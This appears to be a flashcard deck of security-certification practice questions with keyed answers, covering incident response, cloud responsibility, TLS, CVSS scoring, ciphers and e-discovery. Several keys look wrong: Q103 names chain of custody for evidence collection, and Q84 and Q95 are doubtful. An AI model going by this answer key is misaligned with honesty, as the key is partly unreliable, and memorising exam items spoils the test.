An organization developed an incident response plan.

Which of the following would be BEST to assess the effectiveness of the plan?

A. Requesting a third-party review
B. Generating a checklist by organizational unit
C. Establishing role succession and call lists
D. Creating a playbook
E. Performing a tabletop exercise

A

E. Performing a tabletop exercise

82
Q

A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network?

A. Implement network access control to perform host validation of installed patches.
B. Create an 802.1X implementation with certificate-based device identification.
C. Create a vulnerability scanning subnet for remote workers to connect to on the network at headquarters.
D. Install a vulnerability scanning agent on each remote laptop to submit scan data.

A

D. Install a vulnerability scanning agent on each remote laptop to submit scan data.

83
Q

A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files.

Which of the following techniques is the analyst MOST likely using?

A. Honeypot
B. Deception
C. Simulators
D. Sandboxing

A

B. Deception

84
Q

A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login.

Which of the following would BEST help the tester to gather this information? (Choose two.)

A. The new source feature of the web browser
B. The logs from the web server
C. The inspect feature from the web browser
D. A tcpdump from the web server
E. An HTTP interceptor
F. The website certificate viewed via the web browser

A

D & E

85
Q

An architect is designing a security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements:

  • Services must be able to be reconstituted quickly from a known-good state.
  • Network services must be designed to ensure multiple diverse layers of redundancy.
  • Defensive and responsive actions must be automated to reduce human operator demands.

Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)

A. Increased efficiency by embracing advanced caching capabilities
B. Geographic distribution of critical data and services
C. Hardened and verified container usage
D. Emulated hardware architecture usage
E. Establishment of warm and hot sites for continuity of operations
F. Heterogeneous architecture
G. Deployment of IPS services that can identify and block malicious traffic
H. Implementation and configuration of a SOAR

A

B, C, H

86
Q

A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?

A. Implement iterative software releases
B. Revise the scope of the project to use a waterfall approach.
C. Change the scope of the project to use the spiral development methodology.
D. Perform continuous integration.

A

A. Implement iterative software releases

87
Q

A third-party organization has implemented a system that allows it to analyze customers’ data and deliver analysis results without being able to see the raw data.

Which of the following is the organization implementing?

A. Asynchronous keys
B. Homomorphic encryption
C. Data lake
D. Machine learning

A

B. Homomorphic encryption

88
Q

Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?

A. Zigbee
B. Wi-Fi
C. CAN
D. Modbus
E. DNP3

A

A. Zigbee

89
Q

A software development company is building a new mobile application for its social media platform. The company wants to gain its users’ trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust.

To support users’ trust, the company has released the following internal guidelines:
- Mobile clients should verify the identity of all social media servers locally.
- Social media servers should improve TLS performance of their certificate status.
- Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Choose two.)

A. Quick UDP internet connection
B. OCSP stapling
C. Private CA
D. DNSSEC
E. CRL
F. HSTS
G. Distributed object model

A

B & F

90
Q

Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization.

Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy?

A. Align the exploitability metrics to the predetermined system categorization.
B. Align the remediation levels to the predetermined system categorization.
C. Align the impact subscore requirements to the predetermined system categorization.
D. Align the attack vectors to the predetermined system categorization.

A

C. Align the impact subscore requirements to the predetermined system categorization.

91
Q

A cloud engineer is tasked with improving the responsiveness and security of a company’s cloud-based web application. The company is concerned that international users will experience increased latency.

Which of the following is the BEST technology to mitigate this concern?

A. Caching
B. Containerization
C. Content delivery network
D. Clustering

A

C. Content delivery network

92
Q

An organization thinks that its network has active, malicious activity on it. Which of the following capabilities would BEST help to expose the adversary?

A. Installing a honeypot and other decoys
B. Expanding SOC functions to include hunting
C. Enumerating asset configurations
D. Performing a penetration test

A

B. Expanding SOC functions to include hunting

93
Q

An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:

mbedTLS: ca certificate is undefined

Which of the following is the root cause of this issue?

A. iOS devices have an empty root certificate chain by default.
B. OpenSSL is not configured to support PKCS#12 certificate files.
C. The VPN client configuration is missing the CA private key.
D. The iOS keychain imported only the client public and private keys.

A

D. The iOS keychain imported only the client public and private keys.

94
Q

A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process?

A. tcpdump
B. netstat
C. tasklist
D. traceroute
E. ipconfig

A

B. netstat

95
Q

In a shared responsibility model for PaaS, which of the following is a customer’s responsibility?

A. Network security
B. Physical security
C. OS security
D. Host infrastructure

A

A. Network security

96
Q

A security engineer notices the company website allows users to select which country they reside in, such as the following example:

https://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references

A

B. Remote file inclusion

97
Q

A bank has multiple subsidiaries that have independent infrastructures. The bank’s support teams manage all these environments and want to use a single set of credentials.

Which of the following is the BEST way to achieve this goal?

A. SSO
B. Federation
C. Cross-domain
D. Shared credentials

A

B. Federation

98
Q

A SaaS startup is maturing its DevSecOps program and wants to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with remediation. The startup began its early security testing efforts with DAST to cover public-facing application components and recently implemented a bug bounty program.

Which of the following will BEST accomplish the company’s objectives? (Choose two.)

A. IAST
B. RASP
C. SAST
D. SCA
E. WAF
F. CMS

A

A & C

99
Q

Which of the following indicates when a company might not be viable after a disaster?

A. Maximum tolerable downtime
B. Recovery time objective
C. Mean time to recovery
D. Annual loss expectancy

A

A. Maximum tolerable downtime

100
Q

During an incident, an employee’s web traffic was redirected to a malicious domain. The workstation was compromised, and the attacker was able to modify sensitive data from the company file server.

Which of the following solutions would have BEST prevented the initial compromise from happening? (Choose two.)

A. DNSSEC
B. FIM
C. Segmentation
D. Firewall
E. DLP
F. Web proxy

A

A & F

101
Q

A software company wants to build a platform by integrating with another company’s established product. Which of the following provisions would be MOST important to include when drafting an agreement between the two companies?

A. Data sovereignty
B. Shared responsibility
C. Source code escrow
D. Safe harbor considerations

A

C. Source code escrow

102
Q

An organization had been leveraging RC4 to protect the confidentiality of a continuous, high throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors.

Which of the following is MOST likely to meet the organization’s requirements?

A. ChaCha20
B. ECDSA
C. Blowfish
D. AES-GCM
E. AES-CBC

A

A. ChaCha20

103
Q

Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

A. E-discovery
B. Review analysis
C. Information governance
D. Chain of custody

A

D. Chain of custody

104
Q

A domestic, publicly traded, online retailer that sells makeup would like to reduce the risks to the most sensitive type of data within the organization but also the impact to compliance. A risk analyst is performing an assessment of the collection and processing of data used within business processes.

Which of the following types of data pose the GREATEST risk? (Choose two.)

A. Financial data from transactions
B. Shareholder meeting minutes
C. Data of possible European customers
D. Customers’ shipping addresses
E. Deidentified purchasing habits
F. Consumer product purchasing trends

A

A & C

105
Q

A security engineer is creating a single CSR for the following web server hostnames:

  • wwwint.internal
  • www.company.com
  • home.internal
  • www.internal

Which of the following would meet the requirement?

A. SAN
B. CN
C. CA
D. CRL
E. Issuer

A

A. SAN

106
Q

A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation. Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience. The current architecture includes:

  • Directory servers
  • Web servers
  • Database servers
  • Load balancers
  • Cloud-native VPN concentrator
  • Remote access server

The MSP must secure this environment similarly to the infrastructure on premises.

Which of the following should the MSP put in place to BEST meet this objective? (Choose three.)

A. Content delivery network
B. Virtual next-generation firewall
C. Web application firewall
D. Software-defined WAN
E. External vulnerability scans
F. Containers

A

B, C, E

107
Q

A security analyst has been tasked with providing key information in the risk register.

Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Choose two.)

A. Password cracker
B. SCAP scanner
C. Network traffic analyzer
D. Vulnerability scanner
E. Port scanner
F. Protocol analyzer

A

B & D

108
Q

An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization’s new email system provide?

A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements

A

C. E-discovery

109
Q

A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following:

  1. The company has sensitive data.
  2. The company has proprietary data.
  3. The company has its headquarters in Iceland, and the data must always reside in that country.

Which cloud deployment model should be used?

A. Hybrid cloud
B. Community cloud
C. Public cloud
D. Private cloud

A

A. Hybrid cloud

110
Q

When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client?

A. Data
B. Storage
C. Physical security
D. Network

A

A. Data

111
Q

Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Choose two.)

A. Proxy
B. Tunneling
C. VDI
D. MDM
E. RDP
F. MAC address randomization

A

B & F